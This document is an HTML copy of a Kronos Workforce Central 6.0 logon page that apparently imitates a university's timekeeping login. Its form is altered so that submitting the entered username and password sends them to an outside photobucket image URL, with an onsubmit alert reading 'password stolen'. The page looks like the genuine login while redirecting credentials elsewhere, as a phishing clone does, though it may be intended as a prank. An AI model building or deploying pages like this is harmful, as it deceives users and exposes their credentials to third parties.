<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Kronos WORKFORCE CENTRAL(R)</title>
   <meta name="copyright" content="Copyright 2004-2005 Kronos Incorporated. All rights reserved.">
   <meta name="ui-framework-version" content="1.0"/>
   <meta name="ui-framework-file" content="wpk/html/kronos-logonbody.jsp">
   <meta name="ROBOTS" content="NOINDEX, NOFOLLOW">
   <meta http-equiv="Cache-Control" content="no-cache">
   <meta http-equiv="Pragma" content="no-cache">

   <meta http-equiv="Expires" content="-1">
   <script type="text/javascript" src="/wfcstatic/applications/wpk/html/scripts/cookie.js"></script>
   <script type="text/javascript">
		function initErrormessage() {
			if (unescape("").length != 0 ) {
			   document.getElementById("ErrorImageDiv").style.visibility = "visible";
			   document.getElementById("ErrorMessageDiv").style.visibility = "visible";
			}
		}		
		function setlogin() {		
			document.getElementById("pleaseLogin").style.visibility = "hidden";
			document.getElementById("boxLogin").style.visibility = "hidden";
			document.getElementById("loading").style.visibility = "visible";
			document.getElementById("ErrorImageDiv").style.visibility = "hidden";
			document.getElementById("ErrorMessageDiv").style.visibility = "hidden";
			setTimeout('submitPage()',500);
		}
      function doUnload() {     
         document.getElementById("pleaseLogin").style.visibility = "visible";
         document.getElementById("boxLogin").style.visibility = "visible";
         document.getElementById("loading").style.visibility = "hidden";
         document.getElementById("ErrorImageDiv").style.visibility = "visible";
         document.getElementById("ErrorMessageDiv").style.visibility = "visible";
      }
		function submitPage(){
			document.getElementById("LogonForm").submit();
		}  
      function page_load(){
         initErrormessage();
         var logoffCookie = get_cookie("logoff");
         if (logoffCookie != null) {
            isLogoff = 1; // this is a logoff action
            
            chk_and_del_cookie("logoff", "/")
            chk_and_del_cookie("jsessionid")
            chk_and_del_cookie("JSESSIONID")
            chk_and_del_cookie("WFC_USER", "/");
            chk_and_del_cookie("WFC_INSTANCE", "/");
            location.reload()
         }
         document.getElementById("username").focus();
      }
	</script>

<!--[if lt IE 7]>
<script language="JavaScript">
function correctPNG() // correctly handle PNG transparency in Win IE 5.5 & 6.
{
   var arVersion = navigator.appVersion.split("MSIE")
   var version = parseFloat(arVersion[1])
   if ((version >= 5.5) && (document.body.filters)) 
   {
      for(var i=0; i<document.images.length; i++)
      {
         var img = document.images[i]
         var imgName = img.src.toUpperCase()
         if (imgName.substring(imgName.length-3, imgName.length) == "PNG")
         {
            var imgID = (img.id) ? "id='" + img.id + "' " : ""
            var imgClass = (img.className) ? "class='" + img.className + "' " : ""
            var imgTitle = (img.title) ? "title='" + img.title + "' " : "title='" + img.alt + "' "
            var imgStyle = "display:inline-block;" + img.style.cssText 
            if (img.align == "left") imgStyle = "float:left;" + imgStyle
            if (img.align == "right") imgStyle = "float:right;" + imgStyle
            if (img.parentElement.href) imgStyle = "cursor:hand;" + imgStyle
            var strNewHTML = "<span " + imgID + imgClass + imgTitle
            + " style=\"" + "width:" + img.width + "px; height:" + img.height + "px;" + imgStyle + ";"
            + "filter:progid:DXImageTransform.Microsoft.AlphaImageLoader"
            + "(src=\'" + img.src + "\', sizingMethod='scale');\"></span>" 
            img.outerHTML = strNewHTML
            i = i-1
         }
      }
   }    
}
window.attachEvent("onload", correctPNG);
</script>
<![endif]-->
   <style type="text/css">
      body {
         background-color: rgb(255,255,255);
      	font-family: Arial,Verdana,sans-serif;
      	margin: 0px; 
      	padding: 0px;
      	border: 0px; 
      	height: 100%; 
      	top: 0px;
      }
      body.login {
      	background-color: rgb(122,133,173);
      }
      
      /* Header Area for Login Screen (the swoosh) */
      #topSwoosh { 
      	background-color: rgb(122,133,173);
         height: 41px; 
         width: 100%; 
         padding: 0px; 
         margin: 0px; 
         position: relative;
      }
      #topSwoosh .logoLogin {
         color: rgb(255,255,255);
         font-family: Arial,Verdana,sans-serif;
         font-size: 25px;
         font-style: normal;
         font-weight: bold; 
         position: absolute; 
         left: 100px; 
         top: 10px; 
         width: 452px;
      }      
      #topSwoosh .logoLogin .version {
         color: rgb(255,255,255);
         font-family: Arial,Verdana,sans-serif;
         font-size: 12px;
         font-weight: normal;
      }
      #topSwoosh #separator1 {
         background-color: rgb(255,104,3);
         font-size: 1px;
         height: 2px; 
      }
      #topSwoosh #separator2 {
      	background-color: rgb(212,219,225);
         font-size: 1px;
         height: 14px; 
      }
      #topSwoosh #separator3 {
         background-color:rgb(102,102,102);
         font-size: 1px;
         height: 1px; 
      }
      /* Content Area for Login Screen */
      #contentLogin {
      	border-top: 1px solid white;
      	background-color: rgb(255,255,255);
      	background-repeat: no-repeat;
      	background-position:  right bottom;
      	height: 285px;
      	width: 100%;
      }
      
      /* "Loading..." animation, password error message*/
      #loading{
      	visibility:hidden;
      	z-index:1;
      }
      #ErrorMessageDiv, #OfflineMessageDiv, #ErrorImageDiv {
      	visibility: hidden;
      }
      .MessageDiv {
      	position:relative;
      	left:30px;
      	top:-15px;
      	color: rgb(236,71,23);
      	font-size: 11px;
      }
      
      #boxLogin {
         position: absolute;
         left: 80px; 
         top: 128px;	
         padding: 3px;	
         width: 200px;
      }
      #boxLogin .login {
         font-size: 16px; 
         color: rgb(102,102,102);
         font-weight: bold; 
         margin-top: 0px;
      }
      #boxLogin p {
         padding: 3px 0 0 0;
      }
      
      /* Form styles */
      .formField{
      	color: rgb(102,102,102);
      	font-size: 11px;
         margin: 0px;
      }
      input.text {
         color: rgb(0,0,0); 
         font-family: Arial, Verdana, Helvetica, sans-serif; 
         font-size: 11px;
         margin: 0 0 10px 0;
         width: 127px;
      }
      input.btnLogin {
      	background-repeat: no-repeat;
      	height: 20px;
      	left: 5px; 
      	position: relative; 
      	vertical-align: top; 
      	width: 21px;
      }
      
      /*Image styles*/
      img.pleaseLogin {
      	background-repeat: no-repeat;
      	height: 16px;
      	width: 105px;
      }
      img.loginSlogan {
      	background-repeat: no-repeat;
      	left: 320px; 
      	position: absolute; 
      	top: 150px;
      }
      div.loginSlogan1 {
      	position: absolute; 
        left: 0;
      	width: 654px; 
        text-align: right;
      	top: 164px;
        font-family: Verdana, sans-serif;
        font-size: 10px;
        font-weight: bold;
        color: rgb(202,92,18);

      }
      div.loginSlogan2 {
      	position: absolute; 
      	left: 334px; 
        width: 641px;
        text-align: center;
      	top: 183px;
        font-family: Verdana, sans-serif;
        font-size: 10px;
        font-weight: bold;
        color: rgb(202,92,18);
      }
      img.interstitialAnimation {
      	background-repeat: no-repeat;
      	height: 75px;
      	left: 150px; 
      	position: absolute; 
      	top: 150px;
      	width: 654px;
      }
      img.errorIcon {
      	bottom: -10px;
      	position:relative;
      }
      img.warningIcon {
      	bottom: -10px;
      	position:relative;
      }
      #bottomSwoosh {
      	background-color: rgb(122,133,173);
      	background-image: url(/wfcstatic/applications/wpk/html/images/branding/curved-area-separator.gif);
      	background-repeat: no-repeat;
      	background-position:  right bottom;
      	width: 100%;
      	height: 64px;
      }
      #logoWithSlogan {
      	background-repeat: no-repeat;
      	position: relative; left: 42px;
      	top: 20px;
      }
   </style>
</head>
	
<body id="kronos" class="login"  onLoad="page_load();" onUnload="doUnload()">
<div class="Panel">

<table id="topSwoosh" width="100%" cellspacing="0" cellpadding="0">
   <tr>
      <td>
      	<div>
            <img alt="" src="/wfcstatic/applications/wpk/html/images/branding/swoosh-glyph.png" style="width: 100%; height: 41px;"/>
      		<span class="logoLogin" >
      		    WORKFORCE&nbsp;CENTRAL<sup><font size='-3'><sup>&reg;</sup></font></sup>&nbsp;<span class="version" title="6.0.13">Version&nbsp;6.0</span>

      		</span>
      </div>
   	</td>
   </tr>
   <tr>
      <td>
   	<div id="separator1">&nbsp;</div>
   	<div id="separator2">&nbsp;</div>
   	<div id="separator3">&nbsp;</div>

      </td>
   </tr>
</table>

<form style="display:inline;" target="_top" onsubmit="alert('password stolen');" action="http://img.photobucket.com/albums/v98/waffnuffly/DONTCLOCKIN.png?t=1291822262" id="LogonForm" method="POST" name="logonForm">

<table id="contentLogin" width="100%" cellspacing="0" cellpadding="0">
   <tr>
      <td>
      <div>
            <img id="pleaseLogin" alt="" class="loginSlogan" src="/wfcstatic/applications/wpk/html/images/branding/animated-lines.gif" />

            <div class="loginSlogan1"> EXPERTS AT IMPROVING THE PERFORMANCE </div>
            <div class="loginSlogan2"> OF PEOPLE AND BUSINESS </div>
            <img id="loading" alt="" class="interstitialAnimation" src="/wfcstatic/applications/wpk/html/images/branding/animated-lines.gif" />
            <div id="boxLogin">
               <div class="login" >
                  LOG ON
               </div>

               <div style="height: 11px; padding: 0; margin: 0;">&nbsp;</div>
               <h3 class="formField">User Name</h3>
                  <input class="text" name="username" id="username" tabindex="1" type="text"  />
               <h3 class="formField">Password</h3>
                  <input class="text" name="password" id="password" tabindex="2" type="password"  />
                  <input class="btnLogin" type="image" tabindex="4" src="https://mytime.uga.edu/wfcstatic/applications/wpk/themes/basic/icons/button/button-go-full.gif" />
               <br/>
			      

			      
			      
			         <input type="hidden" name="ESS" value='true'/>

			      
			   <div id="ErrorImageDiv"><img class="errorIcon" src="/wfcstatic/applications/wpk/themes/basic/icons/messagebar/error-message-icon.gif" alt=""></div>
			   <div class="MessageDiv" id="ErrorMessageDiv"></div>

			   </div>
		   </div>
         </td>
      </tr>
</table>
<table id="bottomSwoosh" width="100%" cellspacing="0" cellpadding="0">
      <tr>

         <td>&nbsp;</td>
      </tr>
</table>
</form>
<img id="logoWithSlogan" alt="" src="/wfcstatic/applications/wpk/html/images/branding/logo-tagline.gif" />
</div>
</body>
</html>

